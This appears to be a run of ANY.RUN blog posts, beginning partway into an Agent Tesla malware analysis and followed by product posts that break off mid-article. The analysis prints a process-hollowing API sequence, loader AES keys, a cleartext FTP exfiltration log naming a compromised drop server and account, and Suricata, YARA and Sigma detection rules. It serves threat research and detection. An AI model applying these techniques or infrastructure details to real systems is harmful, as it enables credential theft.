WinRAR extracts the archive to reveal Orden de compra_pdf.jse — a JScript Encoded Script (Microsoft Script Encoder format). This encoding is not true encryption, but is highly effective at bypassing signature-based AV detection and preventing casual inspection. The file is executed via Windows Script Host (wscript.exe). 

The .jse dropper performs several actions in sequence: 

• Downloads a decoy PDF from a remote server and opens it to distract the victim while infection proceeds silently in the background. 

• Drops multiple PowerShell stager scripts to C:\Temp\ with randomized names (AYRMWWFH.ps1, Z2KBLYG5.ps1, ELHYLTLT.ps1). 

• Invokes PowerShell with execution policy bypass —  -ExecutionPolicy Bypass-  to run the stagers without triggering security warnings. 

• Modifies registry keys for persistence. 

All PowerShell stager scripts dropped during the campaign share the same SHA256 hash (96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7), confirming use of a standardized stager template across the campaign.

Stage 2 — PowerShell Stager 

The PowerShell stager loads ALTERNATE.dll — the Agent Tesla loader — and injects it into a legitimate Microsoft binary. The choice of injection target is deliberate: aspnet_compiler.exe is a trusted .NET Framework component, and its network activity is rarely flagged by endpoint security tools. 

The stager implements a Process Hollowing injection sequence: 

1. Locate aspnet_compiler.exe on disk 

2. Spawn a suspended process instance 

3. VirtualAllocEx() → allocate memory in target process 

4. WriteProcessMemory() → write ALTERNATE.dll payload 

5. GetProcAddress() → resolve entry point dynamically 

6. Resume execution → Agent Tesla runs inside trusted process 

Stage 3 — ALTERNATE.dll: The Protected Loader 

The DLL is named ALTERNATE.dll internally (with a matching ALTERNATE.pdb debug path left in the binary). Static analysis with Detect-It-Easy reveals a sophisticated protection stack: 

The use of .NET Reactor 6.x explains why standard tools like de4dot fail without additional flags. The correct tool for this protection version is NETReactorSlayer: 

# Recommended approach: 
NETReactorSlayer.CLI.exe --no-pause ALTERNATE.dll 

# Alternative with de4dot (force detector): 
de4dot.exe ALTERNATE.dll --det reactor 

Partial deobfuscation via NETReactorSlayer reduced the binary from 79,872 → 42,496 bytes (a 46.8% reduction), confirming that nearly half the original file consisted purely of protection scaffolding. Post-deobfuscation entropy dropped from 6.0 → 5.86, and previously hidden IL structures became accessible for analysis. 

Internal Architecture (Post-Deobfuscation) 

Analysis of the partially deobfuscated binary (alternate_Slayed.dll) reveals the loader’s true internal architecture. Method names remain obfuscated (smethod_10, Delegate10, Struct10) — a pattern consistent with automated obfuscation frameworks — but the functional structure is now recoverable. 

The loader implements a Read → Decrypt → Decompress → Execute pipeline: 

[ALTERNATE.dll Loader] 
        ↓ 
1. Read encrypted blob from embedded resource 
        ↓ 
2. Decrypt  →  RijndaelManaged (AES-256) + CryptoStream 

                   Key: hardcoded hex constant 

                   IV:  prepended to blob (first 16 bytes) 
        ↓ 
3. Decompress  →  System.IO.Compression (DeflateStream) 
        ↓ 
4. Load  →  Reflection (Assembly.Load from byte array) 

               ResolveMethod / GetMethod / CreateInstance 
        ↓ 

5. Invoke  →  DynamicMethod / CreateDelegate 

        ↓ 
6. Execute  →  Agent Tesla payload runs entirely in memory 

Encryption Layer

The loader uses RijndaelManaged (the .NET implementation of AES) with CryptoStream and explicit set_IV calls, confirming AES-CBC mode with a hardcoded key and a prepended IV. Four 256-bit (32-byte) key candidates were identified in the deobfuscated binary:

D5B7247C497788CF0031CEB06E3DF77A45FEF59F1E49633DC7159816D64759B5 

C61B1941CF756EB7551F7C661743802362728B785ADC22E860D269713DFB01A6 

C356AFF1A01C2B0DA472E584C8E3C8F875B9A24280435D42836A77B19F5A8C18 

F1C3EBE78BD8C38559BF3CFCC9A9FA37D221E31780774A3787E26160A61F5348 

The encrypted payload blob is located at offset 0x4600 in the deobfuscated binary (relocated from 0x12000 in the original), measures 2,560 bytes, and retains maximum entropy of 7.93 / 8.0, confirming the AES encryption survived deobfuscation intact. 

Dynamic Execution via Reflection

The loader avoids static linking of the final payload by using .NET Reflection to load and invoke Agent Tesla entirely from a byte array in memory. The relevant APIs observed post-deobfuscation:

Process Hollowing — Full Win32 API Map 

The deobfuscated binary exposes the complete Process Hollowing implementation as UTF-16 P/Invoke strings. The API sequence is a textbook 32-bit hollowing with Wow64 support for 32→64-bit environments: 

The hollower contains hardcoded error strings —“Failed to allocate memory”, “Failed to unmap section”, “Failed to update PEB”— suggesting it was built from a reusable hollowing template with debug output preserved, a common trait in commodity malware kits. 

Execution Control Flags 

Three internal execution control strings were recovered post-deobfuscation: ALTERNATE, EXECUTE, and LAUNCH. These likely govern different execution paths within the loader — for example, switching between in-process shellcode execution and remote process hollowing depending on runtime conditions such as privilege level or AV detection. 

Stage 4 — Agent Tesla Deployed In-Memory 

The Agent Tesla payload is stored as a 2,560-byte AES-encrypted and deflate-compressed blob embedded in the loader’s .text section. The double-layering — compressed and then encrypted — ensures the payload has no recognizable structure at rest and defeats both signature and entropy-based detection. 

At runtime, the loader decrypts the blob using the hardcoded key and embedded IV, decompresses the result with DeflateStream, then uses Assembly.Load() to instantiate Agent Tesla directly from the resulting byte array in memory. No file is written to disk at any stage from this point forward — the execution is entirely fileless.

3. Payload Analysis: Agent Tesla Unpacked

Memory dumps captured during sandbox execution allowed recovery of the fully decrypted Agent Tesla payload — the binary that runs inside the hollowed aspnet_compiler.exe process. Static analysis of this dump (270,336 bytes, SHA256: 43d09743a69c9afa7156bf4e2bf7423b3d5f5ad7d54c4c3fb8a698d526778057) reveals the complete capability set and hardcoded configuration of this Agent Tesla instance.

Hardcoded Configuration

With the payload decrypted, the complete operator configuration is visible in plaintext — the same values that were hidden behind AES-256 in the loader stage:

The FTP password recovered from the memory dump matches exactly the credentials captured in cleartext by ANY.RUN during the dynamic analysis phase, providing cross-validation between static payload analysis and live network capture.

Credential Theft Capabilities

The unpacked payload targets over 80 applications across six categories, representing one of the broadest credential theft surface areas among commodity stealers:

Keylogger

The payload implements a full system-wide keylogger via Windows hook APIs. 26 special keys are mapped to labeled tokens for inclusion in keylog reports:

{ALT+F4}  {ALT+TAB}  {BACK}  {CAPSLOCK}  {CTRL}  {DEL}
{END}  {ENTER}  {ESC}  {F10}  {F11}  {F12}
{HOME}  {Insert}  {KEYDOWN}  {KEYLEFT}  {KEYRIGHT}  {KEYUP}
{NumLock}  {PageDown}  {PageUp}  {TAB}  {Win}
 
Keylogger interval: configurable via KeyloggerInterval field
Output field:       KeylogText (appended per session)

Additional Capabilities

Clipboard Monitoring
Agent Tesla registers a SetClipboardViewer / ChangeClipboardChain hook to intercept clipboard content in real time. Captured data is tagged with <br><hr>Copied Text: <br>and appended to the exfiltration report. This is particularly effective for capturing copied passwords, API keys, and cryptocurrency wallet addresses.

Screenshot Capture
A configurable screenshot module captures periodic desktop images. The interval is controlled by the KeyloggerInterval setting. Screenshots are base64-encoded and included in the HTML exfiltration report alongside stolen credentials.

Persistence Mechanisms

The payload supports multiple persistence methods, selectable at build time:

• Registry Run key — HKCU\Software\Microsoft\Windows\CurrentVersion\Run[StartupRegName];
• Startup folder — copies itself to %APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\ ;
• Task Scheduler — creates a scheduled task for persistence without registry artifacts;
• GUID-named copy — drops as 7bcd610d-7af6-4dc2-875b-dc4fec91463c.exe to blend with system files.

Anti-Analysis / Anti-VM

The payload performs environment checks before proceeding, scanning for indicators of analysis environments:

Exfiltration Report Format

The HTML report generated by Agent Tesla and uploaded to the FTP drop server follows a fixed template, reconstructed from the payload strings. The format observed in the ANY.RUN network capture matches exactly:

Time: [MM/dd/yyyy HH:mm:ss]
User Name: [Windows username]
Computer Name: [hostname]
OSFullName: [Windows edition]
CPU: [processor model from WMI Win32_Processor]
RAM: [available RAM in MB]
<hr>
Host: [URL where credentials were stolen from]
Username: [stolen username]
Password: [stolen password]
Application: [browser/client name]
<hr>
[...additional credential blocks...]
<hr>Copied Text: [clipboard contents]

This template is hardcoded in the payload and has remained consistent across multiple Agent Tesla v3 builds observed in LATAM campaigns. The ‘Time:’ field uses MM/dd/yyyy format, which combined with the Spanish-language lures, suggests the operator targets both English and Spanish-speaking environments.

4. Dynamic Analysis: Behavioral Confirmation

Detonating the full infection chain in ANY.RUN’s Interactive Sandbox provided behavioral confirmation of the attack and captured artifacts that static analysis alone could not reveal.

Process tree

The full process execution chain observed in the sandbox:

• WinRAR.exe (PID 8100) → extracts .jse dropper;
• wscript.exe (PID 2392) → executes .jse, drops PS1 stagers, downloads decoy PDF;
• powershell.exe (×4: PIDs 4600, 6116, 6240, 6412) → stager execution with bypass;
• aspnet_compiler.exe (PID 7720) → hollowed process – executes Agent Tesla payload.

Pre-Exfiltration: Victim Fingerprinting

Before exfiltrating stolen data, Agent Tesla performs a geolocation and hosting provider check via ip-api[.]com. This common stealer pattern verifies the victim is not running inside a sandbox or corporate proxy before proceeding with exfiltration:

GET http://ip-api.com/line/?fields=hosting HTTP/1.1
Host: ip-api.com
 
→ Response: false  (victim is not a hosting provider)
→ Agent Tesla proceeds with exfiltration

ANY.RUN flagged this request with the Suricata rule: “ET MALWARE Common Stealer Behavior — Source IP Associated with Hosting Provider Check via ip-api.com”, confirming the pre-exfiltration fingerprinting behavior.

Credential Theft

The sandbox confirmed active credential theft from web browsers. The behavioral indicators observed:

• Accesses Chrome and Firefox browser profile directories and credential store databases;
• Reads saved password and autofill data;
• Formats captured credentials as HTML report for exfiltration;
• Collects system fingerprint: hostname, username, OS version, CPU model, RAM.

FTP Exfiltration

The most critical finding from dynamic analysis was the capture of cleartext FTP credentials and exfiltration traffic. FTP operates without transport encryption by default, making the full authentication handshake and data transfer visible in the network capture:

220 Welcome to Pure-FTPd [privsep] [TLS]
331 User americas2@horeca-bucuresti.ro OK. Password required
USER americas2@horeca-bucuresti.ro
PASS [REDACTED]
230 OK. Current restricted directory is /
STOR PW_admin-DESKTOP-JGLLJLD_2026_03_27_17_19_15.html
226 File successfully transferred (3.79 KB/s)

The exfiltrated file follows a consistent naming convention: PW_[username]-[hostname]_[timestamp].html. This structured naming allows the operator to efficiently process stolen credentials from multiple victims in the drop directory.

The following Suricata rules fired during the exfiltration phase:

• ET MALWARE AgentTesla Exfil via FTP
• ET MALWARE Agent Tesla CnC Exfil via TCP
• STEALER [ANY.RUN] AgentTesla Exfiltration (raw TCP) (×2)
• SUSPICIOUS [ANY.RUN] Possible admin username observed in outbound connection
• HUNTING [ANY.RUN] Windows PC hostname observed in outbound connection
• HUNTING [ANY.RUN] Host CPU Enumeration observed in outbound connection

5. Threat Infrastructure Analysis

The C2 Server: 89.39.83.184

The exfiltration target — ftp.horeca-bucuresti[.]ro resolving to 89[.]39[.]83[.]184 — is a legitimate Romanian hospitality business website that has been compromised and repurposed as a drop zone. This operational security tactic makes network blocking harder and attribution more difficult, since blocking the IP may affect a legitimate business.

Querying the IP on VirusTotal reveals 80 malicious files that have communicated with this server, with the earliest samples dating to September 2024 — confirming the infrastructure has been actively maintained for at least 18 months.

Campaign Scope: A LATAM-Focused Operation

Analysis of the 80 samples communicating with this infrastructure reveals a clear targeting pattern focused on Spanish-speaking Latin American enterprises. Pivoting on the campaign in ANY.RUN Threat Intelligence Lookup with the query submissionCountry:”cl” AND threatLevel:”malicious” confirms Chile as the primary submission country, and surfaces correlated behavioral artifacts including the mutex local\sm0:6816:304:wilstaging_02, the Firebase Storage decoy PDF download URL, and all 10 Suricata network threats – all tied to aspnet_compiler.exe as the injected process.

The filenames observed in the communicating files paint a consistent picture:

The Passive DNS history further reveals that the same IP hosted subdomains used as email relay infrastructure: email.v.todotramitesperu.com.elgartizocon[.]ro and email.elrif[.]com — patterns consistent with mail relay abuse to increase phishing email deliverability.

6. MITRE ATT&CK Mapping

Early Detection: Using ANY.RUN Against Agent Tesla Campaigns

ANY.RUN’s Interactive Sandbox is particularly effective for early detection of sophisticated multi-stage loaders like this Agent Tesla campaign. Security teams should integrate the following practices:

• Proactive Sample Submission: Upload suspicious attachments (especially RAR archives with non-standard extensions like .uu, .jse, or macro-enabled Office files) immediately upon receipt for interactive analysis.
• Behavioral Monitoring: Use ANY.RUN’s real-time process tree visualization and Suricata rule matching to identify Process Hollowing into aspnet_compiler.exe, PowerShell stagers, and FTP exfiltration patterns.
• Threat Intelligence Pivoting: After identifying a C2 indicator (e.g., ftp.horeca-bucuresti[.]ro or IP 89.39.83[.]184), pivot within ANY.RUN Threat Intelligence to uncover related samples and campaign scope.
• Team Training: Conduct regular red-team exercises in the interactive environment to train analysts on recognizing .NET Reactor-protected loaders and fileless execution techniques.
• Automated Workflows: Integrate ANY.RUN via API for high-volume email gateway triage, enabling rapid quarantine of matching threats before they reach end users.

Detection Recommendations

Network-Level (Suricata/Snort)

# Detect AgentTesla FTP exfiltration by filename pattern
alert tcp $HOME_NET any -> $EXTERNAL_NET 21 (
  msg:"AgentTesla FTP Credential Exfil - PW_ prefix";
  flow:established,to_server;
  content:"STOR PW_"; depth:8;
  content:".html";
  sid:9000001; rev:1;
)
 
# Detect pre-exfil hosting check
alert http $HOME_NET any -> $EXTERNAL_NET any (
  msg:"AgentTesla - ip-api hosting provider check";
  http.uri; content:"/line/?fields=hosting";
  sid:9000002; rev:1;
)

YARA Rule

rule AgentTesla_ALTERNATE_Loader {
  meta:
    description = "Detects ALTERNATE.dll Agent Tesla loader (.NET Reactor 6.x)"
    author      = "0xOlympus"
    date        = "2026-03-27"
  strings:
    $pdb  = "ALTERNATE.pdb"  ascii
    $name = "ALTERNATE.dll"  ascii
    $aes  = "AesCryptoServiceProvider" wide
    $dec  = "CreateDecryptor"          wide
    $va   = "VirtualAlloc"   ascii
    $wpm  = "WriteProcessMemory" ascii
  condition:
    uint16(0) == 0x5A4D
    and all of ($pdb, $name)
    and all of ($aes, $dec)
    and any of ($va, $wpm)
}

Sigma Rule

title: AgentTesla Process Hollowing via aspnet_compiler.exe
status: experimental
logsource:
  category: process_creation
  product: windows
detection:
  selection:
    ParentImage|endswith: "\\powershell.exe"
    Image|endswith:       "\\aspnet_compiler.exe"
  filter_legit:
    CommandLine|contains:
      - "-f "
      - "-v "
  condition: selection and not filter_legit
falsepositives:
  - Legitimate .NET compilation tasks (rare outside dev environments)
level: high
tags:
  - attack.t1055.012
  - attack.t1059.001

Email Gateway Recommendations

Block or quarantine emails containing attachments matching these patterns:

• Extensions .uu, .jse, .vbe inside archives;
• Macro-enabled Office files (.xlam, .xlsm) from external senders in procurement contexts;
• Filename patterns combining financial terms (orden, nomina, comprobante) with executable extensions.

Important Observations

This investigation yields several actionable findings for security teams in Chile and the broader LATAM region:

The campaign is persistent, not opportunistic

The threat actor has operated continuously since at least mid-2024 using the same FTP infrastructure (89.39.83[.]184) while iterating on lure documents. This is a sustained operation with deliberate LATAM focus.

Dynamic analysis is non-negotiable for this family

.NET Reactor 6.x with virtualization and control flow obfuscation significantly raises the cost of static analysis. Organizations relying solely on static AV will miss this family. Dynamic analysis in sandboxes like ANY.RUN provides the detection coverage that static tools cannot.

FTP exfiltration remains dangerously undermonitored

Despite being a decades-old protocol, FTP exfiltration continues to succeed because most organizations focus monitoring on HTTP/S. Since FTP operates in cleartext, when it is captured, full credentials and data content are visible — but only if outbound FTP traffic is logged and inspected.

Financial and procurement roles are high-value targets

The consistent use of purchase order and payment receipt lures indicates deliberate targeting of accounts payable and procurement departments. Targeted security awareness training for these roles represents a high-ROI defensive investment.

How ANY.RUN Accelerated This Investigation

Several phases of this investigation would have been significantly slower or impossible without ANY.RUN. Here is where the platform made a direct impact:

Interactive Detonation

Unlike fully automated sandboxes, ANY.RUN’s interactive environment allowed real-time observation of the infection chain. This was critical for the .jse stage, which checks for user interaction before proceeding — a common evasion technique that automated systems fail to bypass.

Automatic Network Threat Detection

ANY.RUN matched 6 Suricata rules against the network traffic automatically, immediately confirming the Agent Tesla family and the FTP exfiltration behavior. In a traditional lab setup, this would require manual PCAP capture, Wireshark analysis, and custom rule development.

Cleartext FTP Capture

The cleartext FTP session — including the authentication handshake, the C2 hostname (ftp.horeca-bucuresti[.]ro), and the exfiltrated filename pattern — was captured in full by ANY.RUN’s network interception layer and presented directly in the Network tab, reducing analysis time from hours to minutes.

Threat Intelligence Pivoting

Using the C2 IP as a pivot point in ANY.RUN Threat Intelligence (combined with VirusTotal), we surfaced 80 related malicious samples, identified the 18-month campaign timeline, and mapped the full scope of LATAM targeting — transforming a single sample investigation into a comprehensive campaign report.

Appendix: Complete IOC Reference

About ANY.RUN 

ANY.RUN delivers cybersecurity solutions designed to support real-world SOC operations. They help security teams understand threats faster, make informed decisions, and operationalize threat intelligence across detection, investigation, and response workflows. 

The company’s solutions include Interactive Sandbox for enterprise-grade malware analysis, as well as ANY.RUN’s Threat Intelligence with its modules Threat Intelligence Lookup and Threat Intelligence Feeds, providing continuously updated intelligence based on live attack analysis. 

Used by over 15,000 organizations and 600,000 security professionals worldwide, ANY.RUN is SOC 2 Type II certified, ensuring strong security controls and protection of customer data. 

Request access to ANY.RUN’s solutions →  

The post LATAM Under Siege: Agent Tesla’s 18-Month Credential Theft Campaign Against Chilean Enterprises appeared first on ANY.RUN's Cybersecurity Blog.

• During alert triage, analysts need a quick threat overview to decide on the next steps. 

• Efficient incident response decisions demand clear, actionable context to rely on. 

• Swift incident reporting requires cross-tier visibility without the need for manual processing of raw technical data. 

Making ANY.RUN’s Interactive Sandbox a part of your standard SOC workflow helps eliminate bottlenecks that occur along the incident lifecycle by contributing to the optimization of each process, decision, and report.

SOC-ready Tier 1 reports turn complex sandboxing analysis into structured, decision-ready intelligence for faster, efficient triage, escalation, response, and reporting. 

Executive Summary 

• Whether operating as an internal SOC or delivering MDR and MSSP services, organizations need investigation workflows that scale efficiently under growing alert volumes. 

• ANY.RUN’s Interactive Sandbox with Tier 1 Reports helps standardize triage, escalation, and incident reporting by becoming a decision-support layer for your security operations. 

• Enterprise Suite teams can optimize sandbox investigations and reporting across the SOC at scale with unlimited Tier 1 report generation. 

• The result is faster investigations, consistent escalations with less context lost, and optimized incident documentation for confident decisions and risk prioritization. 

Challenges SOC Teams Face Today  

With SOC teams continuously investigating suspicious files, URLs, phishing pages, and malware samples, turning the resulting massive volume of technical findings into actionable operational context fast enough to support efficient response becomes the key challenge. 

The lack of standardized reporting leads to: 

• Slow triage due to excessive manual work for Tier 1 

• Higher pressure on Tier 2/3 and incident response team due to lack on ready-to-apply context  

• Context loss during escalations and critical delays occur 

• Additional burden falling on SOC managers without clear visibility into incident severity and business impact 

ANY.RUN’s Interactive Sandbox already simplifies malware and phishing analysis through interactive, real-time investigation. Now, with Tier 1 Reports and AI Summary, it supports decision-making and reporting across SOC operations. 

SOC-Ready Reporting Built Into the Analysis Workflow 

New Tier 1 reports are integrated into SOC workflows through and offer complete, structured documents with operationally useful insights. 

Tier 1 report includes:   

• A clear verdict on the analyzed sample   

• AI Summary featuring threat classification and executive summary 

• Key IOCs and behavioral indicators  

• MITRE ATT&CK mapping 

They can be generated directly within the Interactive Sandbox in a single click, making sandbox analysis immediately usable across operational workflows. 

Use Case #1: Fast Threat Understanding for Tier 1 During Triage 

Via Tier 1 reports featuring AI Summaries, ANY.RUN’s Interactive Sandbox provides immediate answers to the most critical questions that occur during alert triage: 

• Is the sample malicious? 

• What behavior indicates that? 

• What type of threat is involved? 

• What MITRE ATT&CK TTPs and IOCs are present? 

• Does the incident require escalation? 

Instead of manually reviewing raw technical data to answer these questions with confidence, the sandbox provides this context automatically in the form of a ready-to-use report that covers all findings into a clear operational document for fast and substantiated decision-making. 

Use Case #2: Easy Access to Context for Tier 2, Tier 3, IR teams  

In case of an escalation, Tier 2 analysts and incident responders frequently need to reconstruct investigation context manually before proceeding with containment. 

Raw sandbox outputs take time to process and interpret, stretching investigation time and creating friction, as higher tiers essentially have to go back to triage stage for verification. 

With Tier 1 reports, analysts get a structured information to pass on at the early stage, making ANY.RUN’s Interactive Sandbox more smoothly embedded into the entire investigation cycle, from triage to response. 

Use Case #3: Immediate Clarity for Decision-Makers 

SOC managers, Heads of SOC, and CISOs don’t have time to review every technical artifact associated with an incident. Traditional reports may contain too many low-level details, whereas security leaders must assess the general business impact and urgency of a threat. 

ANY.RUN’s Interactive Sandbox optimizes the hand-off workflow with a concise overview of the analysis in operational language suitable for leadership. 

With AI Summary as part of the structure, the report explains what happened, why the object is malicious, which assets or systems may be at risk.  

As a result, analysis outputs become standardized and practical, making them immediately usable for decision-making and internal communication. 

Hands-On Case: Generating a Response-Ready Report on a Phishing Attack 

View analysis 

In this phishing investigation, the Tier 1 report provides a clear, operational overview of the entire attack chain, helping both analysts and leadership quickly understand the threat severity and required response actions. 

AI Summary further structures the findings into operationally relevant context suitable for triage, escalation, and internal communication: 

The AI summary highlights the detection of a ClickFix phishing technique, followed by PowerShell execution with Execution Policy bypass attempts used to launch malicious activity on the host. It also outlines payload delivery behavior, subsequent system modifications, and persistence attempts through Windows Registry changes. 

Instead of manually reconstructing the attack flow from raw sandbox telemetry, analysts receive a ready-to-use interpretation of the incident that can immediately support escalation and response workflows. 

The complete attack chain, behavioral indicators, and resulting conclusions are already structured for operational use and are ready for further processing: escalation, IR hand-off, and containment. 

From Analysis to Action: Faster Escalations, Response, and Reporting 

The new Tier 1 reports featuring AI Summary deliver direct operational value across the SOC: 

• Faster Triage: Tier 1 analysts can quickly understand the nature of the threat and make confident decisions on whether to close or escalate alerts. 

• Streamlined Escalation Process: Tier 2 and IR teams receive well-structured context instead of raw data, reducing handoff time and miscommunication. 

• Accelerated Incident Response: Teams gain rapid visibility into attack behavior, helping reduce Mean Time to Respond (MTTR). 

• Improved Internal Reporting: SOC managers and CISOs get consistent, professional summaries that are easy to read and share with stakeholders. 

• More Consistent Performance: Standardized reports reduce quality variation between analysts and lower the risk of human error. 

Unlimited access is available for Enterprise Suite and Hunter plans. Free plan users have a shared limit of 5 generations for both the Tier 1 report and AI Summary. 

Conclusion 

ANY.RUN’s new Tier 1 reports and AI Summary convert sandbox analysis outputs into structured, operationally ready documents that support every stage of the incident lifecycle, from initial triage to executive visibility. 

Embedding Interactive Sandbox directly into a SOC workflow strengthens overall security operations maturity by allowing for faster and more confident decision-making across processes. 

About ANY.RUN 

ANY.RUN delivers cybersecurity solutions designed to support real-world SOC operations. They help security teams understand threats faster, make informed decisions, and operationalize threat intelligence across detection, investigation, and response workflows. 

The company’s solutions include Interactive Sandbox for enterprise-grade malware analysis, as well as ANY.RUN’s Threat Intelligence with its modules Threat Intelligence Lookup and Threat Intelligence Feeds, providing continuously updated intelligence based on live attack analysis. 

Used by over 15,000 organizations and 600,000 security professionals worldwide, ANY.RUN is SOC 2 Type II certified, ensuring strong security controls and protection of customer data. 

Request access to ANY.RUN’s solutions →  

FAQ 

The post New SOC-Ready Reporting for Faster Triage, Escalation, and Incident Response with ANY.RUN  appeared first on ANY.RUN's Cybersecurity Blog.

ANY.RUN solves this by bringing real-time, behavior-validated threat intelligence from ANY.RUN integrated into Elastic Security, where SOC and MSSP teams detect emerging cyberattacks earlier and respond faster without changing their workflows.  

ANY.RUN Threat Intelligence Feeds x Elastic Security: About the Integration  

Integrate ANY.RUN’s TI Feeds in Elastic Security → 

Elastic Security unifies SIEM, endpoint security, and cloud security to help teams protect, investigate, and respond to threats.  

Through the ANY.RUN Threat Intelligence Feeds integration, organizations can ingest third-party threat indicators into Elastic Security and use them in detection, investigation, and threat intelligence workflows. This helps analysts bring external threat context into the same platform they use for security operations.   

ANY.RUN’s Threat Intelligence Feeds are built from live sandbox investigations across more than 15,000 organizations and 600,000 SOC professionals. Indicators reflect infrastructure actively used in phishing, malware delivery, and attacker campaigns, not delayed or aggregated data. Each IOC includes context and a direct link to the sandbox report, allowing analysts to quickly understand threat behavior and TTPs.  

The integration is available as a plug-and-play solution that only requires an active TI Feeds license (via trial or a paid subscription).  

Once configured, Elastic Security can ingest indicators such as IPs, domains, and URLs from the integration on a scheduled basis. Those indicators can then be used across supported detection, investigation, and visualization workflows.     

The additional context associated with ingested indicators can help analysts triage and investigate alerts more efficiently.  

How Threat Intelligence Feeds Improve Detection and Shorten MTTR in Elastic Security  

The integration embeds threat intelligence directly into daily SOC workflows inside Elastic Security. Analysts don’t need to manually check indicators in external tools or move data between systems.  

Here is what your team gains:  

• Detect threats early: Use fresh indicators from live attacks to identify malicious activity sooner.   
• Validate alerts with real context: Use sandbox-backed evidence instead of relying only on static indicators.  
• Reduce manual work: Eliminate repetitive enrichment steps and tool switching.  
• Improve detection quality: Use high-confidence indicators directly in rules and correlation logic.   
• Speed up triage and response: Access context instantly and make faster decisions.   

Together, these improvements help reduce MTTD and MTTR, lower incident response costs, and increase analyst efficiency by enabling teams to handle more cases without expanding headcount. 

Better detection coverage and earlier visibility into active threats contribute to overall business risk reduction by limiting the impact and spread of attacks.  

How to Set Up ANY.RUN’s Threat Intelligence Feeds in Elastic Security  

The integration is designed to be simple and flexible. Once you get an active TI Feeds access, you can navigate to the integration page and follow the instructions.  

Indicators are automatically ingested into Elastic and continuously updated. They become part of detection, search, and response workflows.  

With ANY.RUN Threat Intelligence Feeds in Elastic Security, teams can:  

• Use ingested ANY.RUN indicators in Elastic Security detection workflows  
• Match threat indicators against relevant security telemetry  
• Support triage and investigation with additional indicator context  
• Build dashboards and visualizations for threat intelligence monitoring  
• Incorporate third-party indicators into detection and hunting workflows  

Conclusion  

With ANY.RUN Threat Intelligence Feeds integrated into Elastic’s Security  platform can further enhance customer’s security detection with timely, behavior-validated intelligence., Organizations can detect threats early, reduce manual effort, and make fast, confident decisions.   

This leads not only to better SOC performance, but also to measurable business impact. Early detection, fast response, and improved signal quality help reduce the likelihood and impact of incidents, ultimately lowering overall business risk.  

About ANY.RUN  

ANY.RUN helps security teams understand threats faster and take action with confidence. Its solutions are trusted by over 600,000 security professionals and more than 15,000 organizations across industries where speed and accuracy are critical for effective response.  

ANY.RUN’s Interactive Sandbox allows teams to safely analyze suspicious files and URLs, observe real behavior in real time, and confirm threats before they spread.  

Combined with Threat Intelligence Lookup and Threat Intelligence Feeds, it provides the context needed to prioritize alerts, reduce uncertainty, and stop advanced attacks earlier in the response cycle.  

Request access to ANY.RUN’s solutions →  

The post ANY.RUN & Elastic Security: Bring Threat Intelligence into Detection and Investigation Workflows       appeared first on ANY.RUN's Cybersecurity Blog.

Executive Summary 

• Compliance-driven security measures control maturity, not adversary readiness. Threat-informed defense anchors risk management in real attack behaviors, which is where actual risk lives. 

• MITRE ATT&CK provides the taxonomy, not the intelligence. The framework names and structures adversary techniques; organizations need curated, real-world threat data to make those techniques actionable. 

• SOC workflow integration is non-negotiable. MITRE ATT&CK delivers risk reduction only when embedded into monitoring rules, triage processes, IR playbooks, and hunt methodologies. 

• Speed of context determines security outcomes. Whether in triage or incident response, the time it takes to understand what a threat is doing directly determines how much damage it can cause. ANY.RUN’s Threat Intelligence Lookup and Sandbox compress that context-gathering from hours to seconds.

• Threat hunting requires real attack patterns, not just technique categories. Generic ATT&CK-based hunt queries produce noise; high-fidelity feeds of current attacker behavior produce findings. 

• Risk reduction is measurable. MTTD, MTTR, MTTC, hunt yield rate, and false positive ratios are the business-level metrics that translate MITRE ATT&CK investment into language boards and insurers understand. 

Two Lenses, One Risk: Compliance vs. Adversary-Centered Approach 

Traditional risk management often relies on vulnerability scanning, compliance audits (e.g., NIST, ISO), and static controls. It focuses on known weaknesses and regulatory requirements but frequently misses how attackers chain behaviors in live environments. 

MITRE ATT&CK is adversary-centric and behavior-focused. It maps real-world TTPs across tactics like Initial Access, Execution, Persistence, and Impact. This enables gap analysis, threat modeling, and measurable improvements in detection and response. 

The most important takeaway from this comparison is not that compliance is worthless. It isn’t. Regulatory requirements create accountability, force documentation, and establish minimum hygiene floors that matter for smaller organizations with limited resources. The problem arises when compliance becomes the ceiling rather than the floor. 

Where Strategy Meets Reality: Making MITRE ATT&CK Operational 

MITRE ATT&CK is not a product. It does not detect threats. It does not alert your analysts, contain attackers, or generate threat intelligence. The organizations that extract real risk reduction from MITRE ATT&CK are those that connect the framework’s taxonomy directly to how their SOC actually operates: the tools analysts use, the data they see, the workflows they follow under pressure.

1. Eyes Wide Open: Enhancing Monitoring for Early Threat Detection 

MITRE ATT&CK is a powerful compass for monitoring strategy. It tells defenders which techniques adversaries use during specific phases of an attack. T1566 (Phishing) for initial access, T1055 (Process Injection) for defense evasion, T1021 (Remote Services) for lateral movement, etc. Security teams can use the framework to build detection hypotheses, design SIEM rules, and prioritize which telemetry sources to collect. 

What the SOC Actually Needs 

The value of monitoring emerges from early visibility to enable swift action, reducing dwell time and limiting blast radius. Analysts need alerts with sufficient fidelity and timeliness to intervene while the attack is still in progress. That requires not just knowing which techniques exist, but understanding the current threat landscape: which groups are active, which malware families are being deployed this week, and which detection signatures are already stale. 

Solution: Stay Current with Live Threat Feeds to Cut Detection Lag 

Threat Intelligence Feeds provide continuously updated, machine-readable threat intelligence stream of IOCs (indicators of compromise) with malware family tags derived from real detonations in ANY.RUN’s Interactive Sandbox. Security teams can pipe these feeds directly into their SIEM or EDR, ensuring that MITRE-mapped detection rules stay current with actual adversary activity. 

Business objective: Cut MTTD for novel threats. Increase the ratio of high-fidelity alerts to total alerts, lowering analyst alert fatigue and improving coverage of emerging attack vectors. 

2. Speed Matters: Accelerating Triage with Behavioral Context 

MITRE maps alerts to techniques, but analysts need rapid understanding of intent, impact, and validity to avoid alert fatigue. An alert tagged T1059.001 (PowerShell) tells an analyst that the technique involves command and scripting interpreter abuse. T1112 (Modify Registry) points to potential persistence or defense evasion. This context is valuable. But it is the starting point, not the destination. 

What the SOC Actually Needs 

Analysts dealing with hundreds of alerts per shift cannot afford multi-minute pivot chains to understand whether a flagged PowerShell execution is a legitimate IT automation script or the first stage of a ransomware deployment. They need behavior and impact context fast: What did this process actually do? Has this file hash or domain been seen in confirmed malicious activity?  

Solution: Reduce MTTD with Full Attack Visibility inside a Sandbox 

